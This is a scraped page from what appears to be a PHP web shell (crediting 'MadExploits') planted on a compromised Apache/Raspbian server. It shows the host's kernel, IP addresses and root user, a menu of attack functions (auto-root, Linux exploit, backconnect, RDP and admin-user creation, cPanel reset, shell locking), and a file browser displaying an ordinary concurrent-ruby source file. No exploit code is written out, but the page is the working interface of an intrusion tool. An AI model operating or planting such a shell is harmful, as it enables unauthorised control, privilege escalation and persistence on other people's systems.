Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
concurrent /
actor /
[ HOME SHELL ]
Name
Size
Permission
Action
behaviour
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
behaviour.rb
4.06
KB
-rw-r--r--
context.rb
5.4
KB
-rw-r--r--
core.rb
7.61
KB
-rw-r--r--
default_dead_letter_handler.rb
212
B
-rw-r--r--
envelope.rb
1.06
KB
-rw-r--r--
errors.rb
552
B
-rw-r--r--
internal_delegations.rb
1.34
KB
-rw-r--r--
public_delegations.rb
684
B
-rw-r--r--
reference.rb
4.14
KB
-rw-r--r--
root.rb
1.03
KB
-rw-r--r--
type_check.rb
1.04
KB
-rw-r--r--
utils.rb
255
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : type_check.rb
module Concurrent module Actor # taken from Algebrick # supplies type-checking helpers whenever included module TypeCheck def Type?(value, *types) types.any? { |t| value.is_a? t } end def Type!(value, *types) Type?(value, *types) or TypeCheck.error(value, 'is not', types) value end def Match?(value, *types) types.any? { |t| t === value } end def Match!(value, *types) Match?(value, *types) or TypeCheck.error(value, 'is not matching', types) value end def Child?(value, *types) Type?(value, Class) && types.any? { |t| value <= t } end def Child!(value, *types) Child?(value, *types) or TypeCheck.error(value, 'is not child', types) value end private def self.error(value, message, types) raise TypeError, "Value (#{value.class}) '#{value}' #{message} any of: #{types.join('; ')}." end end end end
Close